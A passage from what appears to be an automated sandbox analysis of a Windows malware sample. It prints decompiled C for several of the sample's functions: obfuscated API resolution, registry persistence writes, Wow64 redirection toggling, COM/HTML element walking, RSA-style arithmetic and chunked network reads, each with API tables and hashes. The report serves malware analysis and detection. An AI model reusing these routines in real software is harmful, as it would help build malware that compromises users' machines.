0x00fc71e3
0x00fc71ea
0x00fc71ee
0x00fc71f1
0x00fc7270
0x00fc7271
0x00fc71f3
0x00fc71f3
0x00fc71f8
0x00fc7200
0x00fc7204
0x00fc7207
0x00000000
0x00fc7209
0x00fc7209
0x00fc720e
0x00fc7216
0x00fc721a
0x00fc721d
0x00000000
0x00fc721f
0x00fc721f
0x00fc7224
0x00fc722c
0x00fc7230
0x00fc7233
0x00000000
0x00fc7235
0x00fc7235
0x00fc723a
0x00fc7242
0x00fc7246
0x00fc7249
0x00000000
0x00fc724b
0x00fc7251
0x00fc7256
0x00fc725d
0x00fc7264
0x00fc7267
0x00000000
0x00fc7269
0x00fc726c
0x00fc726c
0x00fc7267
0x00fc7249
0x00fc7233
0x00fc721d
0x00fc7207
0x00fc71f1
0x00fc7286

APIs

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FC7852,?,?,?,?,00000000,00000000), ref: 00FC71C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FC71EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FC7200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FC7216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FC722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FC7242

Part of subcall function 00FC225C: memset.NTDLL ref: 00FC22DB

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: a6350950c5616e17c028280f31c3077b5fcdd6caf5c7a51ac267217df5bd4353
Instruction ID: 8332fdd5f804780f0826a9dbab37e923041b684451b572a4105c1cfecc9dc0d5
Opcode Fuzzy Hash: a6350950c5616e17c028280f31c3077b5fcdd6caf5c7a51ac267217df5bd4353
Instruction Fuzzy Hash: 49212BB190430ADFDB20EF69CE46EA6B7E8EB45754B044059B805C7221D735E905AFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC63CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00FC63CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00FC2BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xfca2d0; // 0x292d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xfcb4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xfcb92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xfca100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00fc63cd
0x00fc63d4
0x00fc63d8
0x00fc63dd
0x00fc63e4
0x00fc63e7
0x00fc63f1
0x00fc63f6
0x00fc6402
0x00fc6409
0x00fc6413
0x00fc6413
0x00fc640b
0x00fc640b
0x00fc640b
0x00fc640b
0x00fc6419
0x00fc641c
0x00fc6424
0x00fc6427
0x00fc642a
0x00fc642d
0x00fc6432
0x00fc643b
0x00fc6448
0x00fc643d
0x00fc6443
0x00fc6443
0x00fc644e
0x00fc644e
0x00fc6456

APIs

Part of subcall function 00FC2BF3: SysAllocString.OLEAUT32(?), ref: 00FC2C4F
Part of subcall function 00FC2BF3: SysAllocString.OLEAUT32(0070006F), ref: 00FC2C63
Part of subcall function 00FC2BF3: SysAllocString.OLEAUT32(00000000), ref: 00FC2C75
Part of subcall function 00FC2BF3: SysFreeString.OLEAUT32(00000000), ref: 00FC2CD9

memset.NTDLL ref: 00FC63F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FC642D
GetLastError.KERNEL32 ref: 00FC643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FC644E

Strings

<, xrefs: 00FC6402

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 94c15dd785df50ad1a6e155171be108d5dedee4ccb686b8d9d38633b5332fa15
Instruction ID: 222a59815cb905f2ecf58a24dfb5e65f4f0f0da5675ec570f472cd3203d0378b
Opcode Fuzzy Hash: 94c15dd785df50ad1a6e155171be108d5dedee4ccb686b8d9d38633b5332fa15
Instruction Fuzzy Hash: D9113971D04218ABDB14DFA9DD8BFE97BF8BB08394F04802AF905E7251D774A504EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC2A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xfca2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xfca2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xfca2b0 = _t6;
				 *0xfca2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xfca2ac = _t7;
				if(_t7 == 0) {
					 *0xfca2ac =  *0xfca2ac | 0xffffffff;
				}
				return 0;
			}

0x00fc2a20
0x00fc2a28
0x00fc2a2d
0x00000000
0x00fc2a7a
0x00fc2a2f
0x00fc2a37
0x00fc2a77
0x00000000
0x00fc2a77
0x00fc2a39
0x00fc2a3e
0x00fc2a50
0x00fc2a55
0x00fc2a5b
0x00fc2a63
0x00fc2a68
0x00fc2a6a
0x00fc2a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00FC446F,?,?,00000001), ref: 00FC2A20
GetVersion.KERNEL32(?,00000001), ref: 00FC2A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00FC2A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00FC2A5B
GetLastError.KERNEL32(?,00000001), ref: 00FC2A7A

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: be284f6cfb3090a61a4fea423c8b5c131099a0b349a42bef41d1af223eaec9aa
Instruction ID: 59f4996b96340c094d6a82f8eef728a9b88aaadc37e445343ec9129cb5a9e24e
Opcode Fuzzy Hash: be284f6cfb3090a61a4fea423c8b5c131099a0b349a42bef41d1af223eaec9aa
Instruction Fuzzy Hash: 5CF0F471A8931AAFD3608F75AF0BF553AA4B704B54F104519E247C72E0D6B56400AF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00FC202E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FC202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xfca38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00FC33FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E00FC4B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00FC2A03(_a8);
						goto L29;
					}
					_t65 =  *0xfca2d0; // 0x292d5a8
					_t16 = _t65 + 0xfcb908; // 0x65696c43
					_t68 = E00FC33FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00fc90
						if(E00FC5C15(_t103,  *_t33, _t97, _a8,  *0xfca384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xfca2d0; // 0x292d5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xfcba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xfcb927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00FC762C(_t73,  *0xfca384,  *0xfca388,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xfca2d0; // 0x292d5a8
									_t44 = _t75 + 0xfcb893; // 0x74666f53
									_t78 = E00FC33FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00fc90
										E00FC33B7( *_t47, _t97, _a8,  *0xfca388, _a24);
										_t49 = _t107 + 0x10; // 0x3d00fc90
										E00FC33B7( *_t49, _t97, _t105,  *0xfca380, _a16);
										E00FC2A03(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00fc90
									E00FC33B7( *_t40, _t97, _a8,  *0xfca388, _a24);
									_t43 = _t107 + 0x10; // 0x3d00fc90
									E00FC33B7( *_t43, _t97, _a8,  *0xfca380, _a16);
								}
								if( *_t107 != 0) {
									E00FC2A03(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00fc90
					if(E00FC5419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00fc90
							E00FC5C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00FC2A03(_t106);
						_t104 = _a16;
					}
					E00FC2A03(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00FC7973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xfca38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x00fc202e
0x00fc2037
0x00fc203e
0x00fc2043
0x00fc20b0
0x00fc20b6
0x00fc20bb
0x00fc20c4
0x00fc20cb
0x00fc20ce
0x00fc2242
0x00fc2249
0x00fc2249
0x00fc224e
0x00fc2250
0x00fc2250
0x00fc2259
0x00fc2259
0x00fc20d4
0x00fc20e0
0x00fc2238
0x00fc223b
0x00000000
0x00fc223b
0x00fc20e6
0x00fc20eb
0x00fc20f4
0x00fc20fb
0x00fc20fe
0x00fc2148
0x00fc2148
0x00fc215b
0x00fc2165
0x00fc216d
0x00fc2172
0x00fc217c
0x00fc217c
0x00fc2174
0x00fc2174
0x00fc2174
0x00fc2174
0x00fc219e
0x00fc21a6
0x00fc21d4
0x00fc21d9
0x00fc21e2
0x00fc21e7
0x00fc21eb
0x00fc221d
0x00fc21ed
0x00fc21fa
0x00fc21fd
0x00fc220d
0x00fc2210
0x00fc2216
0x00fc2216
0x00fc21a8
0x00fc21b5
0x00fc21b8
0x00fc21ca
0x00fc21cd
0x00fc21cd
0x00fc2227
0x00fc2233
0x00fc2229
0x00fc222c
0x00fc222c
0x00fc2227
0x00fc219e
0x00000000
0x00fc2165
0x00fc210d
0x00fc2117
0x00fc2119
0x00fc211e
0x00fc2122
0x00fc2124
0x00fc212f
0x00fc2132
0x00fc2132
0x00fc2138
0x00fc213d
0x00fc213d
0x00fc2143
0x00000000
0x00fc2143
0x00fc2048
0x00000000
0x00fc206f
0x00fc206f
0x00fc207b
0x00fc208e
0x00fc2094
0x00fc209c
0x00000000
0x00fc209c

APIs

StrChrA.SHLWAPI(00FC7319,0000005F,00000000,00000000,00000104), ref: 00FC2061
lstrcpy.KERNEL32(?,?), ref: 00FC208E

Part of subcall function 00FC33FA: lstrlen.KERNEL32(?,00FCA380,73BB7FC0,00000000,00FC2788,?,?,?,?,?,00FC3EAC,?), ref: 00FC3403
Part of subcall function 00FC33FA: mbstowcs.NTDLL ref: 00FC342A
Part of subcall function 00FC33FA: memset.NTDLL ref: 00FC343C

Part of subcall function 00FC33B7: lstrlenW.KERNEL32(00FC7319,?,?,00FC2202,3D00FC90,80000002,00FC7319,00FC742D,74666F53,4D4C4B48,00FC742D,?,3D00FC90,80000002,00FC7319,?), ref: 00FC33D7

Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F

lstrcpy.KERNEL32(?,00000000), ref: 00FC20B0

Strings

\, xrefs: 00FC2094

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: ee5cf38bb0f126ebc89373b95848ee42e10cf20cc4a1b4e52f47dfeba47bbb37
Instruction ID: 9cb8ddb96f5b51868a62c9d29a507c398ea53cbded1dd4a118ea0dcf583dd5e2
Opcode Fuzzy Hash: ee5cf38bb0f126ebc89373b95848ee42e10cf20cc4a1b4e52f47dfeba47bbb37
Instruction Fuzzy Hash: 9751577250020FAFDF619FA0DE87FAA77B9EB48314F108459FA1593021D73AEA15BB11

Uniqueness

Uniqueness Score: -1.00%

Function 00FC13B4, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00FC13B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xfca2d0; // 0x292d5a8
					_t5 = _t102 + 0xfcb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xfc92d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xfca2d0; // 0x292d5a8
												_t28 = _t108 + 0xfcb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xfca2d0; // 0x292d5a8
														_t33 = _t78 + 0xfcb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00fc13b9
0x00fc13c2
0x00fc13c3
0x00fc13c7
0x00fc13cd
0x00fc13d3
0x00fc13dc
0x00fc13e2
0x00fc13ec
0x00fc13ee
0x00fc13f4
0x00fc13f9
0x00fc1404
0x00fc140c
0x00fc140f
0x00fc1532
0x00fc1415
0x00fc1415
0x00fc1422
0x00fc1428
0x00fc142e
0x00fc1432
0x00fc1438
0x00fc1445
0x00fc1449
0x00fc144f
0x00fc1452
0x00fc1458
0x00fc145e
0x00fc1464
0x00fc1467
0x00fc146a
0x00fc1470
0x00fc1479
0x00fc147f
0x00fc1480
0x00fc1483
0x00fc1484
0x00fc1485
0x00fc148d
0x00fc148e
0x00fc148f
0x00fc1491
0x00fc1495
0x00fc1499
0x00000000
0x00000000
0x00fc149f
0x00fc14a8
0x00fc14ae
0x00fc14b8
0x00fc14bc
0x00fc14be
0x00fc14cb
0x00fc14cf
0x00fc14d7
0x00fc14dc
0x00fc14ee
0x00fc14f0
0x00fc14f6
0x00fc14f6
0x00fc14ff
0x00fc14ff
0x00fc1501
0x00fc1507
0x00fc1507
0x00fc150a
0x00fc1510
0x00fc1513
0x00fc151c
0x00000000
0x00000000
0x00000000
0x00fc151c
0x00fc1470
0x00fc146a
0x00fc1452
0x00fc1522
0x00fc1522
0x00fc1528
0x00fc1528
0x00fc152e
0x00fc152e
0x00fc1537
0x00fc153d
0x00fc153d
0x00fc13f9
0x00fc1546

APIs

SysAllocString.OLEAUT32(00FC92D0), ref: 00FC1404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00FC14E6
SysFreeString.OLEAUT32(00000000), ref: 00FC14FF
SysFreeString.OLEAUT32(?), ref: 00FC152E

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 201479f8c2246f9d9368eafe9cd413da3c9adf38e5a071e5124cb0dae41584f3
Instruction ID: 0b7158f0db7680b75283b3f95f607c4f1a1fcc82327f2bce2d98afbf90ce8ba0
Opcode Fuzzy Hash: 201479f8c2246f9d9368eafe9cd413da3c9adf38e5a071e5124cb0dae41584f3
Instruction Fuzzy Hash: 25516075D0050ADFCB00DFA8C989DAEF7B9FF89304B144988E916EB221D771AD01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FC1E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00FC5278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00FC2399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00FC3C32(_t101,  &_v428, _a8, _t96 - _t81);
					E00FC3C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00FC2399(_t101,  &E00FCA188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00FC2399(_a16, _a4);
						E00FC114C(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00FC7F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00FC7F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00FC5381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00FC45B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00FC5936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00FCA188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00fc1e94
0x00fc1ea0
0x00fc1ea6
0x00fc1eab
0x00fc1eaf
0x00fc2021
0x00fc2025
0x00fc2025
0x00fc1eb5
0x00fc1eb9
0x00fc1ebf
0x00fc1ec0
0x00fc1ecb
0x00fc1ed1
0x00fc1ed6
0x00fc1ed9
0x00fc1ef3
0x00fc1f02
0x00fc1f0e
0x00fc1f18
0x00fc1f1d
0x00fc1f1f
0x00fc1f22
0x00fc1fd9
0x00fc1fdf
0x00fc1ff0
0x00fc2003
0x00fc2019
0x00000000
0x00fc201e
0x00fc1f2b
0x00fc1f32
0x00fc1f36
0x00fc1f3c
0x00fc1f3e
0x00fc1f40
0x00fc1f42
0x00fc1f44
0x00fc1f4e
0x00fc1f53
0x00fc1f55
0x00fc1f57
0x00fc1f58
0x00fc1f59
0x00fc1f5a
0x00fc1f61
0x00fc1f68
0x00fc1f6b
0x00fc1f6b
0x00fc1f38
0x00fc1f38
0x00fc1f38
0x00fc1f73
0x00fc1f7b
0x00fc1f87
0x00fc1f8c
0x00fc1f8c
0x00fc1f91
0x00000000
0x00000000
0x00fc1f93
0x00fc1f96
0x00fc1fa3
0x00000000
0x00000000
0x00fc1fa5
0x00fc1fa5
0x00fc1fb2
0x00fc1f8c
0x00fc1f91
0x00000000
0x00000000
0x00000000
0x00fc1f91
0x00fc1fbc
0x00fc1fbf
0x00fc1fc2
0x00fc1fc9
0x00fc1fc9
0x00fc1fd6
0x00000000
0x00fc1fd6
0x00fc1ec2
0x00fc1ec6
0x00fc1ec7
0x00fc1ec9
0x00000000
0x00000000
0x00000000
0x00fc1ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00FC1F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00FC1F5A
memset.NTDLL ref: 00FC2003
memset.NTDLL ref: 00FC2019

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: d1832cffd5877601c2e14044527e0a9c36ee5409d17e1070839a301a82049a9b
Instruction ID: 6c2ba301f1289c8744ec862543dbfbc5a3319c7932743ff335e5ba152a81420d
Opcode Fuzzy Hash: d1832cffd5877601c2e14044527e0a9c36ee5409d17e1070839a301a82049a9b
Instruction Fuzzy Hash: 41419271A0021AAFDB10EF68CD42FDE77B5EF46720F00456DB809A7182DB74AE54EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FC467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00FC467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0xfca148() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00FC5C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
